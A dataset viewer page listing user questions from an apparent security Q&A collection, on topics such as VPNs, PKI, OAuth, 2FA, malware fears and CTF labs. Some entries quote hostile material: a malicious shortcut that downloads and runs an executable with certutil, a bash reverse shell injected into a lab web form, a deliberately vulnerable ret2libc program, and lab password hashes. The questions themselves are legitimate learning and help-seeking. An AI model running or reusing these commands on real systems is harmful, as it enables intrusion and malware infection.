instruction stringlengths 24 29.9k |
|---|
If you have an image that has malicious code written into it using steganography would a screenshot of that image have functional malicious code as well? Or does the recapture transform the image data enough to scramble anything that was previously arranged?
|
I recently read a piece by an infosec analyst who observed ebay.com doing a local port scan.
I could not believe my eyes, but it was quickly reproduced by me (see below for my observation).
I surfed around to several sites, and found one more that does this (the citibank site, see below for my observation)
I further se... |
Preface
We are currently creating a new system for our clients and are stuck on account recovery when a user loses access to everything.
The system is entirely controlled by our company in the following way:
Our employee creates a client company profile (name*, other fields like logo, website are optional)
Our employe... |
I received an email on the 14th saying that a hacker has access to my pc it says that at the time of hacking my account (myemail@gmail.com) had this password (it was a version of my password but not one that I’ve ever used for my gmail) and it claimed to have been watching me for months and that it had infected my pc t... |
Using Nginx, I hope to restrict the permissible hosts for cookies. My initial intention was to employ a Content Security Policy for this purpose, but I don't see an obvious way to do this via a CSP. Ideally I'd find something like
Restrict-Cookies-Header: hostname1.tld hostname2.tld2
Can something like this be accompl... |
I performed some research on file sharing and anonymity, but it turns out anything I read is not about what I need.
Most articles and forums recommend not to use services like Google Drive or Dropbox, as they don't run on opensource code so you really need to trust the software to be sure your data is safe. Fair enough... |
when getting a list of users in a channel I can see all of my personal details. First question is this what everyone else sees, and second how can I make sure my full name is never visible.
|
About 2 decades ago (late 90s/early 00s), when I was still in high school, I opened up social media accounts online. Over the course of a few years and using these social media platforms, I posted personally-identifying information about myself online.
Today, an old friend contacted me to inform me that someone is stal... |
I am trying to scan our internal site's REST APIs using WebInspect. As the site does not yet follow the Open API Standards or use the Swagger tool, it does not have a .json file that contains the API definitions.
In WebInspect's document, it mentioned something about creating a configuration file for the WISwag.exe too... |
Django web framework uses the Double Submit Cookie pattern for CSRF protection. (The CSRF token is sent in a cookie and also in a hidden form field. Incoming requests are checked for a match between the token in the cookie and the token in the form field. A CSRF attacker can send a request with the correct cookie, but ... |
I am interested in learning about setting up an (internal) enterprise PKI the right way.
What's mostly clear to me is the technical part. Our PKI will implement an hierarchical trust model based on X.509 certificates. The CSP/Trust Center will consist of a CA, an RA, revocation services, and a directory service. We fou... |
I have a computer from the company and, while working at home, I would like to know if the company could be capable of monitoring or spying on my computer.
I am not connected to any company's server and I am using a personal no-log VPN for security reasons.
I am not sure if me being logged in to the company´s mail (gma... |
Let's say I access a website called example.com with VPN.
Here's the flow: me → ISP → VPN → example.com
Do typical VPN providers use the same IP address to receive data from ISP and send data to the destination server (example.com)?
If that is the case, can the government identify me, by matching VPN server address and... |
I have a VPS. There is a web-application running on this VPS.
A user can log into his account, create a project (the system automatically creates a folder for this project) and then, he can create and edit PHP files via the file manager within this folder/project.
He edits those files via web-application's interface.
T... |
I'm currently using a self-signed CA certificate in a development environment and I generate certificates signed by this CA.
I want to add an AIA extension to any new certificates I generate with the location of this CA cert.
How do I do this? Do I need to add something to my openssl.cnf config file when creating a new... |
Is there a way to find the date when a CVE (identified by the CVE-ID) is detected and the date when a fix/patch is available?
|
I am using crypto module of node js for exchanging key using diffie-hellman algorithm.
server.js
const crypto = require("crypto");
const alice = crypto.createDiffieHellman(512);
const aliceKey = alice.generateKeys();
client.js
const bob = crypto.createDiffieHellman(alice.getPrime(), alice.getGenerator());
const bo... |
My personal IPs on AWS are being scanned for 3379. Apparently, this is SOCORFS, registered to one Hugo Charbonneau. This port is getting scanned a lot more often in recent months:
https://isc.sans.edu/port.html?port=3379
Does anyone know what this is? It's possible someone found a vulnerability in this protocol and we'... |
I'm trying to manually verify the signature in an S/MIME signed email with openssl as part of a homework. While I have the mail and can extract the chain of certificates, I'm failing to extract the actual signature of the email and verify that it matches the mail content and senders certificate.
I have the public key ... |
Apps such as Fail2ban and DenyHosts enable unix administrators to limit username/password combo attempts to typically 3 attempts. But why 3? Some admins enable more, like 6 or 8 giving honest users a little more slack when making different attempts at a password they may not recall exactly. But why not 18? Or even 30? ... |
I have a mobile application and the backend is hosted on a cloud provider. I would like to ask for feedback on encrypting all REST API calls that will be used to communicate with the server, if we should or we shouldn't do it.
Adding details:
< Certificate pinning is in place >
for example instead of having a proper re... |
I know printers are a security hole. I am trying to get the best setup to minimize risk.
Here's the risk that I am trying to mitigate : that an attacker remotely access the printer, and use it as a launchpad to infect other computers.
So I decided to do this:
do not setup access to wifi to the printer. Since I assume ... |
This question is essentially the opposite of Why isn't PKCE encouraged for Single-Page Apps?.
In recent years, most OAuth API vendors seem to be have become unanimous in recommending that JavaScript apps without a server backend (a.k.a. SPAs) use a proof-key-for-code-exchange grant flow (PKCE, as documented here).
What... |
I have been implementing server-sent shaders using OpenGL for a game (GLSL version 1.20.8).
Executing server-sent shaders on the client obviously is remote code execution, which tends to be a bad thing. But shaders are fairly constrained - they have well-defined outputs and inputs, which are both controlled by the clie... |
Since a router in bridge mode works like a modem, do you need to even update it?
|
I have a western digital blue disk, which is one of the SMR variations. I've heard that they support TRIM command. The disk is accidentally quick formatted on Windows 10, and now seems to be all zero. But, I'm wondering, for a disk it would take illogical amount of effort to actually set all sectors (1TB) to zero. I do... |
Can an SSL certificate be signed by two issuers at the same time?
Let's take an intermediate certificate as an example.
It is usually signed by a root. A root certificate is often self-signed.
In my understanding, if we take cross-signing, there are usually two or more certificate sets as we have several intermediate o... |
I am evaluating the idea of simplified second factor authentication by requiring a file to be uploaded, such as an image along with username/password. The file is stored on a user's device.
My reasoning is that this is faster/simpler than getting a code via SMS and entering it. Specifically, the user does not need to... |
I'm using John to generate some word lists and I'm trying to figure out the most optimized way to do the next step. What I want to do is add ever possible 3 digit number to a set where the first digit of the number is not the same as the first digit in the set
Set example 123ABC
to add
+ 213 = 123ABC213 OK
+ 131 = 123A... |
As I was unable to find any thread about this particular question, I'm trying to ask the community for help.
We're currently using RSA RADIUS based 2FA to authenticate external VPN users from companies to let them manage their systems inside our corporate network. The support contract for this solution will not be exte... |
When I run the command netstat -a to see the actual connections on my computer, I see all the time that my computer is connected to something like this ec2-xx-xx-xx-xx, not just one address it changes many times
Proto ---- local address ---- remote address ---- state
TCP ---- my_address:port ---- ec2-xx-xx-xx-xx:po... |
I have been using AWS for hosting personal projects, mostly in the form of containerized Django web apps running on ECS with Fargate. I have referenced this article to better understand Fargate task networking: https://aws.amazon.com/blogs/compute/task-networking-in-aws-fargate/
I understand that tasks can be launched ... |
If AV auto-scan will detect and prevent the malware from executing why there is a need to enable schedule/full scans?
I'm asking because a full scan can create sometimes overhead on the machine and network, so I'm trying to understand the advantages of enabling full scanning if auto-scan will provide AV protection whe... |
I Have lost my zip file password and I tried to recover it with Windows 10, using John the Ripper 1.9.0 Jumbo.
Things I know from this password:
9 to 11 characters
Alphabetics A B E F and a b e f (pretty much sure)
Digits 0 2 3 5 9
Specials @ and %
Can somebody please put instruction what is the most fastest way reco... |
I use an "anonymous" mail address (cock.li provider in my case). I have found that mainstream news sites in particular don't send their newsletters to such an addresses. It looks like the domains blacklisted.
What is the reason? I can understand that they don't want you writing comments from anonymous mail addresses, b... |
Why are there different pentest phases/stages/methodologies?
Which one should be used?
Why don't we come out with standard one?
E.g.
Wikipedia / Cybrary.it
Reconnaissance
Scanning
Gaining Access
Maintaining Access
Covering Tracks
Tutorialspoint
Reconnaissance
Scanning
Gaining Access
Maintaining Access
Clearing Tr... |
Tor's approach to countering fingerprinting is to make as many users "appear the same" as possible. Let us call this "generalization". While Brave tries to randomize all fingerprints of each and every user in a unique way (for each new opened session).
A short quote from Brave to get the context:
"We're adding subtle,... |
I posted this question already on SO, but as it is not really a programmin question I thought it might be a better place to ask here:
I want to setup a new SSL certificate store for generating SSL certs (server certs (nginx) and client certs (linux/windows devices))
I'm searching already for quite some time and I'm not... |
Say, I was reviewing my log files and noticed that someone with certain public key tried to connect to my server and got access denied (because his public key is not in my authorized_keys file).
May I somehow gather more information about user/host with this associated public keys? For example, this key may be attached... |
Scenario:
Network printer "Scan To Shared Folder" feature.
Network printer IP address: 192.168.0.10
Network printer "Scan To Shared Folder" details:
Network path: \\192.168.0.155\Folder\Subfolder
Login username: aficio
Password:****** Retype Password:******
Based on what stated above, my guessing is that on the 192.... |
I have read these posts: https://www.cnet.com/news/fraudulent-google-certificate-points-to-internet-attack/
https://support.google.com/mail/forum/AAAAK7un8RU3J3r2JqFNTw/?hl=en&gpf=d/category-topic/gmail/share-and-discuss-with-others/3J3r2JqFNTw
As far as I know, a certificate should be installed on a server.
So I don't... |
I am currently using 2-factor authentication to tighten security for my login system. I use Google Authenticator to scan a QR Code, which generates a key which I can use to login.
What worries me with my implementation is the way I create my QR Code in PHP using this API:
'https://chart.googleapis.com/chart?chs='.$wid... |
There's a website and it shows two pieces of information for a user:
"IP location: [country]" and "Detected location: [country]".
When I use a VPN, the "IP location" country matches the VPN country, but the "Detected location" always shows the real country.
I have reviewed several methods mentioned in previous question... |
I want to create Angular 9 + Spring Boot application with strong security complaint to PCI-DSS security standard.
Which security protocol is preferred for user sessions in order to have high security when we use Angular and Spring Boot:
Session cookies
OAuth2
OAuth2 + JWT
JWT
for now I'm thinking to secure the app... |
I have a host system (Windows 10) with premium antivirus and running a Windows 7 in Virtualbox with no antivirus. I have installed sandboxie and try to run executable files that may contain virus. Is it safe to run those applications? and what will be the effect if the virus slips out. I know this is a dumb question ev... |
I found this question I want to host a server from my home computer; safe? that indicates that hosting anything connected to the open web on a private is a great security risk. As I am totally new to this topic, I wonder if tunneling the traffic via 6tunnel over a virtual server provided by one of the many options chan... |
Could these two attack scenarios exploit the recently publicized vulnerability?
Using a Thunderbolt adapter like an USB-to-Thunderbolt adapter on a computer without any Thunderbolt port
Temporarily replacing hardware (mainboard) with hardware that has Intel's Thunderbolt port
And if one or both would work: what would... |
As said in the title, I've to encrypt a message with RSA, generate a signature, and transmit everything over CAN-FD (suppose keys are already been exchanged). The problem is that a CAN-FD frame supports a total of 64 bytes of payload, but how many bytes will I have after encryption (using a 2048 bit key) and signing? D... |
Commercial VPN services are gaining a lot of popularity and some of them are heavily advertising their products on social media networks and technology magazines today.
The advantages of using such a service could be privacy from ISPs and additional protection from man-in-the-middle attacks when connecting mobile dev... |
I have this code that I need to use to perform a ret2libc
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buf[256];
printf("buff is at:%p\n",buf);
printf("%s",argv[1]);
strcpy(buf, argv[1]);
printf(buf);
}
I compile it as gcc -m32 -fno-stack-protector ./rt2.c -ort2
and t... |
I've been trying Kioptrix: Level 1.1 (#2) and managed to get root access.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
wolf@linux:~$ nc -vklp 8080
listening on [any] 8080 ...
10.10.10.10: inverse host lookup failed: Unknown host
connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795
id
uid=48(apache) gid... |
I'm trying to get my head straight about how to properly design a OpenID connect provider and the roles to use with it. I understand the basic of scopes, claims and the different flow one can use. However, I'm trying to get my head around how I should handle the cases where i want M2M access to all resources, and a end... |
This is known md5 hash for Kioptrix: Level 1.1 (#2)
Linux unshadow file
wolf@linux:~$ cat md5hash.txt
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
wolf@l... |
I accidentally clicked on a shortcut that is a script.. The shortcut was:
%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?9dKbb7d8ff89ahih=icarian_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%US... |
Yes! this sounds crazy, and it is, please let me give you some background about this...
I'm doing a self-checkin app for a hotel, this app will store this checkin data in google sheets, where the front desk staff can copy and paste it to the main System, in the past guests had to fill this checkin data in a paper form,... |
I'm familiar with creating Linux memory profiles as stated here. However, this is assuming that I have access to the live system which often times is not the case.
I heard there is a way to build the profile with the compiled linux kernel but I cannot find any documentation on how to do that through googling. Is anyone... |
My laptop doesn't have TPM. If I enable BL PIN and someone steals my laptop and remove the drive, will they be able to read it's content on another computer? How am I vulnerable without TPM?
|
I've been working on just a fun side project in C++ to practice encryption algorithms and I sort of ran into a bit of a roadblock of sorts. To summarize the project I have a text file of encrypted passwords and sites the passwords are for, the user logs in and the encrypted information is stored into a list. Simple eno... |
I was finishing a clean installation of macOS Catalina on my MacBook, and I was asked to select a wifi network. I misclicked on a wifi network with a name that's very similar to mine and was asked to enter the password, obviously I cancelled it and selected my own network instead.
Can the act of requesting to join that... |
I have two servers with a pair of RSA public and private keys.
We do not use a CA for the internal communication yet and therefore we need to exchange keys without CA.
I need to establish a trust between two servers: I need to copy a public key form the first server to the second server and the public key from the seco... |
I just clean installed my MacOS Catalina on my MacBook due to virus on my PC that I worried got on my MacBook via usb file transfer.
I did an internet recovery to reinstall MacOS Catalina with my home WiFi network, with password protected. However, since my Pc was had a virus, I was worried that my IP addresss and home... |
I live in an apartment complex with lots of people, and oftentimes I would be able to see Bluetooth devices that do not belong to me on my iPhone or MacBook when I search for my Bluetooth device.
Does Apple tell you/ask by default before someone with a Bluetooth device tries to connect to your phone via Bluetooth? Or ... |
It seems there is a large divide as to wether or not you should have JWT or Session ID for managing user session on WebApp/API (for a web front end or/and a mobile app).
It seems that the consensus goes to not using JWT (1,2,3,4) and keep on using cookies but i've seen more and more tutorials and people using JWT by de... |
When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions.
When attempting to replicate this in metasploit I use set payload windows/x64/shell/reverse_tcp then I set the LHOST and LPORT and run the script on the victim machine. The connection establishes, ... |
To access an API developed by a co-worker, he needed to whitelist my IP address and give me a certificate, which came in with the .pfx extension. I can access the API front-end just fine, but I cannot make it work for another co-worker using the same certificate.
My understanding to all this is very limited, hope I cou... |
I'm doing a nmap scan to my own machine to my own machine. First of all I set the port 333 to listen with this command sudo nc -lvnp 333
On the other terminal I run sudo nmap -O -sV -p 0-65535 IP where IP is my local IP. The result I got on the nmap terminal is this one:
But on the terminal where I opened the port, th... |
I noticed after encrypting some files with 7zip that they contained the information about the encryption algorithm used AES 256, i want to know if there is a better software that doesn't leave traces about the nature of encryption because with such information this will simplify the task of deciphering by the attacker.... |
Can't one just implement a malloc/calloc wrapper that adds the returned pointer address to a global hash table prior to returning, and then a free wrapper that checks for the presence of the pointer in the table prior to freeing (returning early if it isn't present, and removing it if it is), and then LD_PRELOAD these ... |
I'm reading some basic info about Web Cryptography API and I'm wondering if is possible to implement some crypto provider (C/C++ library or something) with some extra algorithms or is mandatory to use the ones "embedded" with the web browser. I have finded articles about the security and tutorials about how to use it b... |
I'm currently working on understanding and contemplating to implement password strength validation for sign ups in my app, to include checking haveibeenpwned if entered password is compromised elsewhere.
I understand the process involves the site sending a partial hash of the password to HIBP and HIBP will respond whet... |
Imagine there is a wireless network using WPA2, and an attacker has come along with his wireless card in monitor mode. What will the packets from that network look like? Is any information disclosed i.e Destination/Source IPs/Ports? Or is it all just encrypted? The attacker is not connected to the network.
|
I was wondering if the website can detect the remote operation of my PC while I’m visiting.
For example;
I visit one website and click here and there while using my laptop for controlling my desktop using chrome remote desktop.
Can the website find out that I’m remote controlling?
|
Recently I found a leaked database of a company and I do not know how to go about contacting the company. It is so weird because I cannot find any type of Information Security contact email to report this to. It just has a support email. I feel uncomfortable sending the link to the support email.
Should I ask for an I... |
It is said that PEM certificates are encoded with ASCII (Base64), excluding labels.
Let's take this certificate as an example.
-----BEGIN CERTIFICATE-----
MIIEMjCCAxqgAwIBAgIBATANBgkqhkiG9w0BAQUFADB7MQswCQYDVQQGEwJHQjEb
MBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHDAdTYWxmb3JkMRow
GAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDE... |
Has someone done an actual study on how effective typo domains are versus random websites in phishing links?
I am trying to justify the expense of going after typosquatters and the possibility of the domains being used as a phishing attack is my best argument at this point, but a lot of the phishing attacks against our... |
Reddit has a new image upload feature that takes a very long time to work after you click submit-- as long as 30 seconds. It isn't caused by the upload itself; that happens very quickly. I don't know what it is, and it makes me nervous, so I thought I would ask.
Could Reddit be doing something with the upload feature t... |
I have a backup routine via crontab on Ubuntu.
This routine generates a compressed tar.gz file and sends it to AWS S3.
But I want to encrypt these files and be able to decrypt them when necessary on another machine only if I have the private key.
While searching I found gpg, and I execute the command below to compress ... |
I have a project that I have to present on a Zoom call for my AP Computer Science class. I have a flask site that I am running off of my laptop onto a port forward. When I run the server it says:
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Deb... |
Hash values are also useful for verifying the integrity of data sent through insecure channels. The hash value of received data can be compared to the hash value of data as it was sent to determine whether the data was altered. Source.
A common approach used in data transmission is for the sender to create a unique... |
I'm trying to set up an SSTP VPN on Windows Server 2019 Essentials (I was originally going to use L2TP/IPSec, but the company which manages our network infrastructure doesn't support it). I'm new to this, so sorry if these are silly questions.
I think I'm OK until it comes to the SSL certificate. We have a domain, whic... |
I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1
My question is why netcat reverse shell executed in web br... |
I some days see a cmd.exe opening and typing "echo off", then disappear.
My computer is slow, but I'm not sure if a program running with first line "echo off" would be so slow as to let me see it being typed... That's a reason to believe it's a person.
On the other hand, if someone else log into one's pc, it will open ... |
I remember playing Minecraft (Java-we're only talking about Minecraft Java on the computer here) at like 13-14 years old, and having this server owner claim that the server has been hacked, and that attackers were able to gain extra privileges on Minecraft, like operator (in-game admin) status and such, as well as grie... |
I have an (https-only) API that uses OAuth2 for authentication and authorization via access tokens.
Any request to the API needs an access token to the Authorization header. The API validates that this access token is signed by a specific tenant (e.g. google), is targeted to a specific audience, and has some specific s... |
Say I enter a place with public WIFI. Of course, I would not connect to the network since I know it's risky, but I do have my computer turned on. Can an attacker know my computer is there and force a connection to it? If they would be able to do so, than my precaution is wasted, and any attacks a malicious network coul... |
Let's say a malicious actor publishes a piece of software that calls a screenshot function (e.g. Graphics.CopyFromScreen() or the UIAutomation Framework in .NET) every so often, but doesn't notify the user of that. I download and install that software.
Assuming that the software is signed with a valid publisher certif... |
I have set up Burp proxy to intercept requests of an Android app. I am able to intercept app API calls except for live video streams. I am not aware of how the video stream is implemented but assuming there should be WebSocket or HTTP requests made to stream video.
Please help me how can I intercept live streaming. My ... |
I have recently received an e-mail from an existing support group e-mail box with the following characteristics:
written in the language used in company's HQ (different from English which is the primary communication language)
had a zip attachment
provides a clear password for the attachment
is a reply of a legitimate... |
The goal of COVID-19 exposure notification is to notify people that they were exposed to someone who later tested positive for the virus. Protecting privacy in this process requires some cryptography, and avoiding excessively granular detail on user locations. But providing data useful for disease prevention requires a... |
According to my CloudFlare firewall logs, somebody went through each of my subdomains. My website is not advertised, it doesn't even show on Google unless typing the exact domain name into it. I think I know where they found it listed, though.
Fortunately, the connections were refused by CloudFlare due to the client us... |
I read that uuid does not bring any security advantages
But I can't find why It doesn't bring a little bit of extra security in the scenario below ?:
Consider that right now the session id is encrypting the auto-increment id (no uuid is used). If someone manages to know how the session is encrypted, then he can imperso... |
I'm using airgeddon (https://github.com/v1s1t0r1sh3r3/airgeddon) to perform a deauthentication attack on my wifi network.
When i put my wireless interface in monitor mode to scan the network from the outside I found the router's BSSID, which is 10:13:31:F1:48:8D, and then I tried to perform various deauthentication att... |
I know never to use phone number as a sole or backup authentication factor. But if a customer forgets their password, and I want to use information they know about their account alongside access to the phone number as a potential avenue to recover their account, is there a way to check if their phone number was recentl... |
Specifically, I was trying to install windows 10 on a fresh new ssd, i was trying to use a usb to do it but it turns out I did not create the usb drive correctly, so I’m stuck on the “reboot and select proper boot devices” screen on my bios.
If the usb was infected, can it infect my ssd or my bios at this point?
|
I have the following problem:
There are 3 parties A, B and X.
X is holding 2 entities on behalf of A and B.
A communicates with X to operate it's own entity. B also communicates with X to operate it's own entity.
Permissions could be revoked at any time for A and B to access their entities.
Permission revocation i... |
Was reading this: How to check if a Wi-Fi network is safe to connect to?
When I came across some comments
I can redirect you to other pages without your interaction. Install key loggers. Heck if your browser runs activeX objects I could open a shell on your machine without your knowledge. That last example is rare the... |
I've been instructed to use the state of our system's TPM's PCR registers to prevent the system we're working on from booting if one of the PCR registers is different from what we expect. In service of that goal, I'm reading over this article: https://threat.tevora.com/secure-boot-tpm-2/
there is a paragraph near the m... |
I need to save user email on a public database but I don't want to do it in plaintext, so I need to hash it. If somebody wants to verify if some email exists in the public database, he or she can calculate hash and check if the hash is there.
I don't want any other user to find out what the email is by knowing only a h... |
I would like to know if there is any way to recover the plain-text of a message that's been encrypted with 55 rounds of the Caesar cipher, with a different (independently chosen) key for each round; I must use a brute-force attack, and do not know the length of the keys or characters used.
|
I have a website developed using VueJS (i.e. its a single page application). I've been looking at implementing Content Security Policy headers. As I tested out the header values I would need, I realised I would have to allow 'unsafe-inline' scripts, as this is fundamentally what my website is.
I've read around this a ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.